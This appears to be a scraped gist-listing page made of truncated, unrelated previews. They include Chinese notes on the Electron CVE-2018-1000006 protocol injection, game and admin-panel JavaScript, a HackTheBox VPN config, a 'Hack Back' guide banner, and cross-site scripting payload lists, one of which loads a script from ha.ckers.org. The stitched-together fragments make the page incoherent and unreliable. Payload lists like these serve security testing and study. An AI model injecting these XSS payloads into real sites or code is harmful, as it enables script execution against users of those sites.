- 【CVE-2018-1000006】
- 参考资料:
- 后来,补上的一篇,考古资料:
- Electron 自定义协议命令注入(CVE-2018-1000006)分析和 Url Scheme 安全考古
- 讲了很多,其它的【奇门相关方法】。
- 可直接上手复现,的Demo环境:
- Electron,在【1.8.2】及更早版本,在【协议处理程序】中 存在漏洞。
- 特别是,在 Win10 、Win7 、 Windows 2008 上,运行的Electron程序,可以【注册自定义协议处理程序】
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Learn cc.Class: | |
// - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/class.html | |
// - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/class.html | |
// Learn Attribute: | |
// - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/reference/attributes.html | |
// - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/reference/attributes.html | |
// Learn life-cycle callbacks: | |
// - [Chinese] http://docs.cocos.com/creator/manual/zh/scripting/life-cycle-callbacks.html | |
// - [English] http://www.cocos2d-x.org/docs/creator/en/scripting/life-cycle-callbacks.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* 此处,尝试对德州的游戏,进行 框架的抽取。 | |
*/ | |
declare namespace AbstractGame { | |
/*进入房间*/ | |
interface EnterRoom { | |
initRoom(): void;//整个房间初始化 | |
initRunningRound(): void;//若当前牌局进行中 | |
initXiuxiRound(): void;//若当前牌局休息中 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 当前用户不是经纪商 | |
if (this.userDetail.isAgent == 0) { | |
if (this.setNewcomer == '0') { | |
// 修改当前普通用户经纪商信息 | |
const postData = {} | |
postData.agentId = this.ruleForm.parentId | |
postData.userId = this.ruleForm.userId | |
res = await this.userApi.agentApi.createNormalAgent(postData) | |
} else { | |
// 修改当前用户为经纪商 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 缩放 放大事件 | |
_pinchout(e) { | |
let now = new Date().getTime(); | |
let offset = tool.offset(this.$refs.touch_com.$el); | |
if (!this.pinchoutTimer || now - this.pinchoutTimer >= 300) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var paths = [ | |
["Account"], | |
["Account", "Payment Methods"], | |
["Account", "Payment Methods", "Credit Card"], | |
["Account", "Payment Methods", "Paypal"], | |
["Account", "Emails"], | |
["Account", "Emails", "Main Email"], | |
["Account", "Emails", "Backup Email"], | |
["Account", "Devices"], | |
["Account", "Devices", "Google Pixel"], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _ _ ____ _ _ | |
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | |
| _ | (_| | (__| < | |_) | (_| | (__| <|_| | |
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) | |
A DIY Guide | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
client | |
dev tun | |
proto udp | |
remote edge-eu-starting-point-vip-1.hackthebox.eu 1337 | |
resolv-retry infinite | |
nobind | |
persist-key | |
persist-tun | |
remote-cert-tls server | |
comp-lzo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert(1)</script> |
OlderNewer